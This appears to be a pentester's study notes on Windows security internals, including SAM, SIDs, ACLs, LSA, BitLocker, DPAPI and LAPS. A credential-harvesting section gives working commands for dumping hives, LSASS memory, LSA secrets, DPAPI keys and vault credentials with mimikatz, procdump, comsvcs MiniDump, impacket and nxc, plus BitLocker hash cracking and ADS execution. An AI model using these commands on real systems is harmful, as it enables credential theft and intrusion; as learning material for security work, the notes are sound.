Windows Security
Windows has built-in tools and features that increase security and reduce the attack surface exploitable by attackers.
Formerly known as Windows Defender, Windows Security provides features to help ensure the safety and privacy of the system.
- Antivirus
- Ransomware protection
- Network Firewall
- SmartScreen
- ...
It's important to keep the operating system up to date. Windows Update is responsible for downloading and installing updates.
Updates are usually released on the 2nd Tuesday of each month, which is often called "Patch Tuesday."
You can open Windows Update from a terminal using:
PS> control /name Microsoft.WindowsUpdate
Microsoft frequently releases security updates for their products.
Authentication & Authorization
Security Accounts Manager (SAM)
The SAM (Security Accounts Manager) database is a local database present on every Windows computer. It is used for authentication and stores account information, including usernames and password hashes.
Modern versions of Windows store passwords as NT hashes (commonly referred to as NTLM hashes); the older format was the LM hash.
The database is stored in /Windows/System32/config/SAM/ (admin-only).
The SAM database is mounted in the registry at hklm/sam.
⚠️ The SAM database is often partially encrypted using SYSKEY.
SYSKEY, Bootkey, and System Hive
SYSKEY is a security feature that partially encrypts the SAM database with a key to protect against offline cracking.
- SYSKEY defines the configuration of the bootkey
- The bootkey is the key used to encrypt the SAM database
- The system hive contains the bootkey
The system hive is stored in /Windows/System32/config/System/ (admin-only) and mounted in the registry at hklm/system.
Security Hive
The security hive stores the security configuration, but it also holds cached credentials of domain users on domain-joined machines.
It is mounted in the registry at hklm/security.
Security Identifier (SID)
Each object (user, service, etc.) that can be authenticated is called a "security principal" and has a security identifier (SID). SIDs are used to verify that a principal is authorized to perform an action.
A SID is the concatenation of a domain identifier and a relative identifier (RID). SIDs start with S-, and the last hyphen-separated value is the RID.
PS> whoami /user
PS> wmic useraccount get name,sid
For a domain user, the SID is <domain SID>-<rid>. The administrator RID is usually 500 (0x1f4).
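As an added example (not part of the original notes), a small Python parser that splits a textual SID into its domain identifier and RID, flags well-known RIDs such as 500, and also decodes the binary SID layout found in registry values and ACEs; the sample SIDs are constructed.

```python
import struct

# Well-known RIDs for classification. The notes above mention 500; the other
# values are standard Windows RIDs added here for illustration.
WELL_KNOWN_RIDS = {
    500: "Administrator", 501: "Guest", 502: "krbtgt",
    512: "Domain Admins", 513: "Domain Users", 519: "Enterprise Admins",
}

def parse_sid(sid: str) -> dict:
    """Split a textual SID 'S-<revision>-<authority>-<sub1>-...-<subN>'
    into its components; the last sub-authority is the RID."""
    parts = sid.split("-")
    if len(parts) < 4 or parts[0] != "S":
        raise ValueError(f"not a SID: {sid!r}")
    revision, authority = int(parts[1]), int(parts[2])
    subs = [int(p) for p in parts[3:]]
    if revision != 1:
        raise ValueError(f"unsupported SID revision: {sid!r}")
    # Domain and local-machine SIDs look like S-1-5-21-X-Y-Z-RID: the domain
    # identifier is everything before the RID.
    is_domain = authority == 5 and len(subs) == 5 and subs[0] == 21
    rid = subs[-1]
    return {
        "revision": revision,
        "authority": authority,
        "subauthorities": subs,
        "domain_sid": "-".join(parts[:-1]) if is_domain else None,
        "rid": rid,
        "well_known": WELL_KNOWN_RIDS.get(rid) if is_domain else None,
    }

def sid_from_bytes(raw: bytes) -> str:
    """Decode the binary SID layout used in registry values and ACEs:
    revision (1 byte), sub-authority count (1 byte), identifier authority
    (6 bytes, big-endian), then count x 4-byte little-endian sub-authorities."""
    if len(raw) < 8:
        raise ValueError("SID too short")
    revision, count = raw[0], raw[1]
    if len(raw) != 8 + 4 * count:
        raise ValueError("SID length does not match its sub-authority count")
    authority = int.from_bytes(raw[2:8], "big")
    subs = struct.unpack("<%dI" % count, raw[8:])
    return "S-%d-%d" % (revision, authority) + "".join("-%d" % s for s in subs)
```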
Access Control
Access to any resource is managed by Access Control Entries (ACEs) in Access Control Lists (ACLs). An ACL is a set of ACEs.
Each ACE specifies the permissions (R, W, X, etc.) granted or denied to a particular user or group (identified by its SID) over a "securable object", i.e. a resource that can be secured (files, services, etc.). In short, an ACE holds a SID, a 32-bit access mask (the permissions), inheritance flags (I), and an ACE type (allow/deny).
A security descriptor is a data structure associated with a securable object. It contains information such as:
- Discretionary Access Control List (DACL): A list of ACEs
- System Access Control List (SACL): Optionally, a list that specifies which security events should be audited.
If there is no DACL, every user is granted full rights.
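To make the order-dependent evaluation concrete, here is an added Python model (not from the original notes) of an access check against a DACL: it implements the no-DACL rule above, the empty-DACL case (nobody gets access), and the top-to-bottom walk in which a deny ACE on a still-needed right stops the check; the SIDs and mask bits are constructed.

```python
from dataclasses import dataclass, field

READ, WRITE, EXECUTE = 0x1, 0x2, 0x4   # subset of the 32-bit access mask
FULL = READ | WRITE | EXECUTE

@dataclass
class ACE:
    kind: str   # ACE type: "allow" or "deny"
    sid: str    # trustee: a user or group SID
    mask: int   # access mask of the granted or denied rights

@dataclass
class Token:
    user_sid: str
    group_sids: set = field(default_factory=set)

    def holds(self, sid: str) -> bool:
        return sid == self.user_sid or sid in self.group_sids

def access_check(token: Token, dacl, requested: int) -> bool:
    """Walk the DACL in order, as Windows does. dacl=None models a NULL DACL
    (no DACL at all): everyone gets full rights. dacl=[] is an empty DACL:
    nobody gets anything. A deny ACE covering a right not yet granted ends
    the check with a denial, so canonical DACLs put deny ACEs first."""
    if dacl is None:
        return True
    granted = 0
    for ace in dacl:
        remaining = requested & ~granted
        if not remaining:
            break                      # every requested bit already granted
        if not token.holds(ace.sid):
            continue                   # ACE is for someone else
        if ace.kind == "deny" and ace.mask & remaining:
            return False
        if ace.kind == "allow":
            granted |= ace.mask & requested
    return (requested & ~granted) == 0

def is_canonical(dacl) -> bool:
    """Explicit deny ACEs must precede explicit allow ACEs; otherwise an
    earlier allow silently wins over a later deny for the same right."""
    seen_allow = False
    for ace in dacl or []:
        if ace.kind == "allow":
            seen_allow = True
        elif seen_allow:               # a deny after an allow
            return False
    return True
```

A non-canonical DACL is worth flagging during a review: the same ACEs in the wrong order change the outcome of the check.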
Access Token
Access tokens are dynamically generated by Windows. They represent the security context of a thread or process: a data structure holding the information Windows uses to decide whether the process is allowed to access a securable object, such as:
- User SID and group SIDs
- Privileges and permissions beyond an object's DACL
- ...
Local Security Authority (LSA)
The Local Security Authority (LSA) is a process responsible for security-related functions in the operating system.
- Authenticating users
- Enforcing security policies
- Generating access tokens (they contain security information such as privileges, used by processes to authorize users)
It's managed by lsass.exe, the Local Security Authority Subsystem Service (LSASS).
From what I understand, LSA secrets are entries in the registry that may contain cleartext passwords along with the DPAPI key, etc.
BitLocker Encrypted Drive
BitLocker is a full-disk encryption feature of Windows. The drive must be unlocked at boot in order to read its contents, using one of:
- USB key
- PIN or password
- Trusted Platform Module (TPM)
- ⚠️ Network Unlock
A recovery key can alternatively be used. It's a randomly generated 48-digit string of numbers. It can be saved in Active Directory, in your Microsoft account, on an external drive, etc.
BitLocker needs the drive to have two partitions. The first partition holds the files necessary to start the system, while the other holds the full operating system and your files.
Assuming you mounted the locked partition as /dev/xxxp2:
$ # unlock and map in /dev/mapper/mytag
$ sudo cryptsetup bitlkOpen /dev/xxxp2 mytag
$ sudo cryptsetup bitlkClose mytag
bitlocker2john extracts hashes for the user password ($0/$1) or the recovery key ($2/$3). You can then try hash cracking or bitcracker (0.8k ⭐, last activity 2021).
$ # https://openwall.info/wiki/john/OpenCL-BitLocker
$ bitlocker2john -i xxx.vhd > myhashes
$ grep "bitlocker\$0" myhashes > myhash
$ hashcat -m 22100 myhash wordlist
Windows Credentials Harvesting Notes ⚠️
Article about it: Windows secrets extraction: a summary.
Windows Credentials Harvesting - Overview
Pentesters may find themselves in one of the following scenarios, and the tools used vary accordingly:
- Extract and analyze data from Windows (mimikatz)
- Extract and analyze data from Linux (impacket, nxc)
- Extract data on Windows, analyze on Linux (mimikatz, pypykatz)
Additionally, Metasploit's Meterpreter includes modules to dump hashes from a privileged session AND it embeds Mimikatz (kiwi), so there is no need to upload it.
Dump Credentials From The SAM Database
You can dump the hives and analyze them with Mimikatz.
PS> reg save hklm\system C:\XXX\system.hive
PS> reg save hklm\sam C:\XXX\sam.hive
PS> reg save hklm\security C:\XXX\security.hive
mimikatz# lsadump::sam /system:./system.hive /sam:./sam.hive
mimikatz# lsadump::sam /system:./system.hive /sam:./sam.hive /security:./security.hive
If you have a meterpreter, you can use kiwi:
meterpreter> load kiwi; lsa_dump_sam
From Linux, you can dump hashes from SAM using:
$ nxc smb IP -u xxx -p yyy --sam
$ nxc smb IP --local-auth -u xxx -p yyy --sam
On Linux, you can analyze locally downloaded hives using:
PS> reg save [...] # and send them to Linux
$ impacket-secretsdump -sam sam.hive -security security.hive -system system.hive LOCAL
On Linux, you can remotely dump hashes using impacket:
$ impacket-secretsdump example.com/username:password@TARGET
On Windows, you can also use DSInternals (1.5k ⭐).
Dump Credentials Protected By The DPAPI
The Data Protection API (DPAPI) is a Windows component used to encrypt data; software such as Google Chrome relies on it for its saved-passwords feature (more on that here).
The user's password is used to derive the DPAPI master key, usually stored in %appdata%\Roaming\Microsoft\Protect\ (hidden).
- Each folder name is the SID of the associated user
- The file inside the SID folder is the user's DPAPI master key file
- We can crack the user password from the master key file
- If we have the user password, we can extract the master key. With the SID S-A-B-C-D-E-F-G and the filename H-I-J-K-L:
$ pypykatz dpapi prekey password S-A-B-C-D-E-F-G password -o ./prekey
$ pypykatz dpapi masterkey ./H-I-J-K-L ./prekey -o mkf
$ impacket-dpapi masterkey -file H-I-J-K-L -sid S-A-B-C-D-E-F-G -password password
- We can extract the master key from the LSASS process memory
Dump Credentials From The Credential Manager
Windows has a feature called Credential Manager, used by applications to store credentials. Each user has one, usually stored in %appdata%\Local\Microsoft\Credentials\.
It can be accessed from the GUI, or using the command line:
PS> vaultcmd /list
PS> vaultcmd /listcreds:"Web Credentials" /all
PS> vaultcmd /listcreds:"Windows Credentials" /all
You can also use Mimikatz:
mimikatz# vault::list
mimikatz# vault::cred
Dump mscash Secrets
Refer to ired.
Dump LSA Secrets
From Linux, you can use:
$ nxc smb IP --local-auth -u xxx -p yyy --lsa # dump secrets
If you have a meterpreter, you can use kiwi:
meterpreter> load kiwi; lsa_dump_secrets
On Linux, you can remotely dump them using impacket:
$ impacket-secretsdump example.com/username:password@TARGET
Dump Credentials From LSASS Process Memory
The LSASS process holds the DPAPI master key of the logged-on user, which can be used to decrypt the credentials of applications relying on DPAPI. It also contains tickets and WDigest cleartext credentials.
You can dump the memory using rundll32 (admin not required?):
PS> tasklist /svc | findstr "lsa"
lsass.exe 4242
PS> Get-Process lsass | Select Id
Id
--
4242
PS> rundll32 C:\windows\system32\comsvcs.dll, MiniDump 4242 C:\lsass.dmp full
<detected by antivirus>
You can dump the memory using procdump (admin required):
PS> .\procdump.exe -accepteula -ma lsass.exe lsass.dmp
On Windows, with Mimikatz, you can dump the process directly OR load a dump that you created manually.
mimikatz# lsadump::lsa /patch # Dump
mimikatz# sekurlsa::minidump ./lsass.dmp # Load a dump
mimikatz# sekurlsa::dpapi # ...
mimikatz# sekurlsa::logonpasswords # ...
On Linux, you can read the memory dump using pypykatz.
$ pypykatz lsa minidump lsass.dmp
Windows Security Notes 🛡️
Microsoft Local Administrator Password Solution (LAPS)
Microsoft Local Administrator Password Solution (LAPS) was designed to prevent lateral movement, which often happens when the local administrator account password is reused across machines (mostly due to golden images).
It manages local administrator passwords and rotates them.
The LAPSToolkit (0.7k ⭐) can detect which machines have LAPS installed and which don't. It can also detect which users can view the LAPS password for each machine.
PS> Find-LAPSDelegatedGroups
PS> Find-AdmPwdExtendedRights
PS> Get-LAPSComputers
Random Notes
Alternate Data Streams (ADS)
On NTFS filesystems, ADS allows files to have more than one stream of data. By default, every file has one stream called :$DATA.
PS> Get-Item -Path SomeFile -Stream * # list streams
PSPath : Microsoft.PowerShell.Core\FileSystem::XXX\toto.pdf::$DATA
PSParentPath : Microsoft.PowerShell.Core\FileSystem::XXX
PSChildName : toto.pdf::$DATA
PSDrive : XXX
PSProvider : Microsoft.PowerShell.Core\FileSystem
PSIsContainer : False
FileName : XXX\toto.pdf
Stream : :$DATA
Length : 0
PS> gci -recurse | % { gi $_.FullName -stream * } | where stream -ne ':$Data'
Windows itself uses them to store data, such as identifiers telling Windows that the file was downloaded from the Internet.
Attackers can use them to store malicious code inside a file; this code may be executed by a vulnerable application loading the file.
PS> $(Resolve-Path .\file.exe:stream) # vulnerable PS call
PS> wmic process call create $(Resolve-Path file.exe:stream)
Volume Shadow Copy Service (VSS)
The Volume Shadow Copy Service (VSS) handles the creation and management of shadow copies (snapshots) of the data being backed up.
It stores data in the "volume information" of each drive that has the feature enabled. Shadow copies may allow a system admin to restore the system after an attack, so attackers will most likely check for them and delete them.
To manage them, right-click on a hard drive and select "Shadow copies." Shadow copies can be stored externally.
PS> vssadmin CREATE SHADOW /For=C:
PS> vssadmin list volumes
To restore a shadow copy, right-click on a folder, navigate to 'Previous versions', select one, and press 'Restore.'
➡️ See also: Volume Shadow Copy Service and diskshadow.
PowerShell SecureString
The PowerShell SecureString class represents text that should be kept confidential. You can create one using:
PS> $SecurePassword = ConvertTo-SecureString "Toto" -AsPlainText -Force
PS> $SecurePassword = Get-Content xxx.enc | ConvertTo-SecureString -key $(Get-Content "xxx.key")
To decrypt one, there are various methods:
PS> $UnsecurePassword = ConvertFrom-SecureString -SecureString $SecurePassword -AsPlainText
PS> $UnsecurePassword = (New-Object PSCredential 0, $SecurePassword).GetNetworkCredential().Password
For credentials stored using Export-Clixml, use:
PS> $credential = Import-Clixml -Path 'pass.xml'
PS> $credential.GetNetworkCredential().Password
To-do
Stuff that I found but never read or used yet.
- lusrmgr.msc: can be used to find entry points (weak passwords, groups with too many permissions)
- msconfig (find malware?), winver (outdated?), control system (open ports...), msinfo32 (outdated?), compmgmt (scheduled tasks...), regedit (misconfiguration...): their info can help in finding vulnerabilities
- UserAccountControlSettings: identify weakness
- Microsoft Security Compliance Toolkit (SCT)
- CIS-CAT
- Microsoft Defender Application Control
- device guard
- Hiren's bootcd
- SASE
- Windows credential guard
- Windows Tilde Filenames (Refer to IIS)
- Windows Defender Firewall
- Block access to share if not in the same workgroup?
- Application Whitelisting
- AppLocker
- Local Group Policy (gpedit.msc)
- rundll32 shell32.dll,Control_RunDLL .\xxx.dll
- Admin Approval Mode (AAM) enabled (new admins: regular token but can elevate, medium mandatory level)
- Default RID 500 administrator, high mandatory level
- Defender External Attack Surface Management